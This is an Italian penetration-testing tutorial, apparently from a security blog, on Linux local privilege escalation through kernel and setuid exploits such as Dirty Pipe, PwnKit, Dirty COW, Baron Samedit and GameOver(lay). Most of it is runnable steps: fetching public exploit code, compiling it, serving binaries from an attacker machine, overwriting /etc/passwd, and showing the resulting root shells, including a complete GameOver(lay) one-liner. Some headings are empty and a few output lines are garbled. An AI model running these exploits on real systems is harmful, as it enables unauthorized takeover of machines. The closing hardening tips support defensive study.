Kernel Exploits: privesc reale su Linux e Windows

Executive Summary — I kernel exploit sono l’ultimo resort nella Linux Privilege Escalation (https://hackita.it/articoli/linux-privesc): quando sudo, SUID, cron e capabilities falliscono, resta il kernel. Un kernel exploit sfrutta vulnerabilità nel kernel Linux — il componente con privilegi massimi. Se funziona, ottieni root immediato. Rischio: exploit instabile → kernel panic / crash del sistema. Per questo è l’ultima tecnica in un pentest. Questo articolo copre i principali kernel exploit (2016–2026), identificazione del kernel vulnerabile, ricerca exploit, compilazione ed esecuzione.

TL;DR • uname -r + cat /etc/os-release → identifica kernel/distro → match con CVE noti • Dirty Pipe (CVE-2022-0847), Dirty COW (CVE-2016-5195), PwnKit (CVE-2021-4034), GameOver(lay) (CVE-2023-2640 / 32629) = LPE comuni e altamente sfruttati • linux-exploit-suggester → script che confronta kernel/versione con database exploit → suggerisce LPE compatibili

https://www.picussecurity.com/resource/linux-dirty-pipe-cve-2022-0847-vulnerability-exploitation-explained

Workflow — Dal Kernel all’Exploit #

1. uname -r                              → versione kernel
2. cat /etc/os-release                   → distribuzione
3. linux-exploit-suggester               → CVE suggeriti
4. Verifica su Exploit-DB / GitHub       → trova PoC
5. Compila sul target (o cross-compile)  → binario
6. Esegui                                → root (o kernel panic)

Step 1: Identifica il kernel #

uname -r

5.4.0-42-generic

uname -a

Linux target 5.4.0-42-generic #46-Ubuntu SMP x86_64 GNU/Linux

cat /etc/os-release

NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"

Step 2: Cerca exploit automaticamente #

# linux-exploit-suggester
bash les.sh

Output:

[+] [CVE-2022-0847] DirtyPipe
   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04|22.04){5.8-5.16}
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-4034] PwnKit
   Details: https://blog.qualys.com/
   Exposure: highly probable
   Tags: ubuntu=10.04{default}|...
   Download URL: https://github.com/.../CVE-2021-4034

[+] [CVE-2021-3156] Baron Samedit
   Details: https://blog.qualys.com/
   Exposure: probable
   Tags: ubuntu=(18.04|20.04){sudo 1.8.2-1.9.5p1}

# searchsploit
searchsploit linux kernel 5.4 privilege escalation

I Kernel Exploit Critici — Catalogo Completo #

CVE-2022-0847 — Dirty Pipe #

Come funziona: sfrutta un bug nella pipe del kernel per sovrascrivere qualsiasi file, anche se read-only. Puoi sovrascrivere /etc/passwd per aggiungere un utente root o sovrascrivere un SUID binary.

# Verifica versione
uname -r
# 5.13.0-28-generic → vulnerabile

# Scarica e compila
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez

# Esegui (sovrascrive SUID binary per dare root)
./dirtypipez /usr/bin/su

Output:

[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont hierarchical the p]
root@target:#

Variante — sovrascrittura /etc/passwd:

# Compila la variante che modifica /etc/passwd
gcc dirty_pipe_passwd.c -o dp
./dp
# Aggiunge utente root con password nota
su piped
# Password: piped → root

CVE-2021-4034 — PwnKit (Polkit pkexec) #

Come funziona: pkexec ha un bug nella gestione degli argomenti (argc=0) che permette di iniettare una variabile d’ambiente che carica una libreria malevola.

# Verifica
which pkexec
# /usr/bin/pkexec → presente
ls -la /usr/bin/pkexec
# -rwsr-xr-x → SUID root

# Scarica PoC
git clone https://github.com/ly4k/PwnKit
cd PwnKit

# Compila
make

# Esegui
./PwnKit

Output:

root@target:# id
uid=0(root) gid=0(root) groups=0(root)

Versione one-liner (pre-compilata):

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit

CVE-2016-5195 — Dirty COW #

# Scarica
searchsploit -m 40839

# Compila
gcc -pthread 40839.c -o dirty_cow -lcrypt

# Esegui (modifica /etc/passwd — aggiunge utente firefart:root)
./dirty_cow

Variante per SUID (più stabile):

wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/cowroot.c
gcc cowroot.c -o cowroot -pthread
./cowroot

CVE-2021-3156 — Baron Samedit (sudo) #

# Verifica versione sudo
sudo --version
# Sudo version 1.8.31 → vulnerabile

# Test (se crashea, è vulnerabile)
sudoedit -s '\' $(python3 -c 'print("A"*1000)')

# Scarica exploit
git clone https://github.com/blasty/CVE-2021-3156
cd CVE-2021-3156

# Compila (scegli il target giusto per la distro)
make

# Esegui
./sudo-hax-me-a-sandwich 0  # 0 = Ubuntu 20.04

Output:

# id
uid=0(root) gid=0(root) groups=0(root)

CVE-2023-2640 / CVE-2023-32629 — GameOver(lay) #

# One-liner
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p]* l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash")'

CVE-2024-1086 — nf_tables Use-After-Free #

git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit

CVE-2022-2588 — Dirty Cred #

CVE-2022-34918 — Netfilter heap overflow #

CVE-2022-0185 — Filesystem context heap overflow #

Questo exploit è particolarmente rilevante per la container escape — funziona anche da container non privilegiato.

Tabella Riepilogativa #

Compilazione — Come Preparare l’Exploit #

Sul target (se gcc è disponibile) #

which gcc
# /usr/bin/gcc

gcc exploit.c -o exploit
gcc exploit.c -o exploit -pthread -lcrypt  # Se necessario

Cross-compilazione (dalla tua macchina) #

Se il target non ha gcc:

# Sulla tua Kali (stessa architettura):
gcc -static exploit.c -o exploit
# -static include tutte le librerie → funziona senza dipendenze

# Trasferisci
python3 -m http.server 8080
# Sul target:
wget http://10.10.10.200:8080/exploit
chmod +x exploit
./exploit

Per i metodi di file transfer: wget, curl, nc, scp, base64.

Se il PoC è in Python/Go #

# Python: verifica versione
python3 --version

# Go: compila staticamente sulla tua macchina
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o exploit exploit.go
# Trasferisci il binario compilato

Rischi e Precauzioni #

⚠️ KERNEL PANIC: un exploit che fallisce può crashare il sistema
   → In un pentest, questo è inaccettabile su sistemi di produzione
   → Testa SEMPRE in lab prima
   → Chiedi autorizzazione specifica per kernel exploit

⚠️ INSTABILITÀ: anche un exploit che funziona può lasciare il kernel
   instabile → monitora il sistema dopo l'esecuzione

⚠️ RILEVAMENTO: kernel exploit generano eventi anomali nei log
   → auditd, syslog, dmesg possono mostrare tracce

⚠️ ORDINE: tenta SEMPRE le tecniche non-kernel prima
   → sudo, SUID, cron, capabilities, NFS, Docker sono più sicure
   → Kernel exploit = ultima risorsa

Cheat Sheet Finale #

Enumerazione #

Top exploit per anno #

Hardening #

• Kernel aggiornato — patch regolari
• Rimuovi pkexec se non necessario
• sudo aggiornato all’ultima versione
• Kernel hardening: KASLR, SMEP, SMAP abilitati
• Seccomp e AppArmor/SELinux per limitare le syscall
• kernel.unprivileged_userns_clone=0 contro container escape

Riferimento: linux-exploit-suggester, Exploit-DB, kernel.org security advisories. Uso esclusivo in ambienti autorizzati.

hackita.it/supporto — hackita.it/servizi.